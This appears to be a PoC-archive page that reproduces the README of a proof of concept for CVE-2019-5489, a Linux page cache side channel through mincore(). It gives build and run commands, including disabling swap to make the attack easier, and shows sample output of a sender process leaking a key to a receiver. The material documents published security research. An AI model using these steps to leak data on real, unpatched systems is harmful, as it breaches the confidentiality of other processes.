Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-5489 PoC — Linux kernel 信息泄露漏洞

Source
https://github.com/mmxsrup/CVE-2019-5489
Associated Vulnerability
Title:Linux kernel 信息泄露漏洞 (CVE-2019-5489)
Description:Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 Linux kernel 4.19.13及之前版本中的mm/mincore.c文件的mincore()的实现存在信息泄露漏洞。本地攻击者可利用该漏洞嗅探机密信息。
Description
Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux
Readme
# CVE 2019-5489
This repository contains Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux.

In order to evaluate page cache side channel, I have implemented **covert channel** between two processes.
The sender process send confidential data to a receiver process via the page cache side channel.
Page cache attacks has been mitigated in Linux Kenrel 5.0 and later, so **this PoC will only work before Linux Kernel 5.0**.

NOTE: I've tested works on Ubuntu 18.04, Linux 4.15.0-70.

## Building
Run the following command.
```sh
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make
```

## Running
Disable swap space to make attack easier.
```sh
swapoff -a
```
### Terminal 1
At first, run the following command on terminal 1.
```sh
make run-sender
```
### Terminal 2
After `sending 1th character ...` is output on the terminal 1, run the following command.
```sh
make run-receiver
```

## Output
If the execution is successful, the following will be output.  
This shows that the key was sent from the Sender process to the Reciver process via page cache side channel.
### Terminal 1
```txt
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...
```
### Terminal 2
```txt
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord
```

## References
- Daniel Gruss et al. Page cache attacks [CCS 19]
File Snapshot

 [4.0K]  /data/pocs/a05f830ef3b53bce197deac573370232a2077911
├── [ 981]  covert_channel.c
├── [ 245]  covert_channel.h
├── [1.0K]  LICENSE
├── [ 728]  Makefile
├── [2.0K]  README.md
├── [1.3K]  receiver.c
├── [1.9K]  sender.c
├── [1.9K]  util.c
└── [ 164]  util.h

0 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.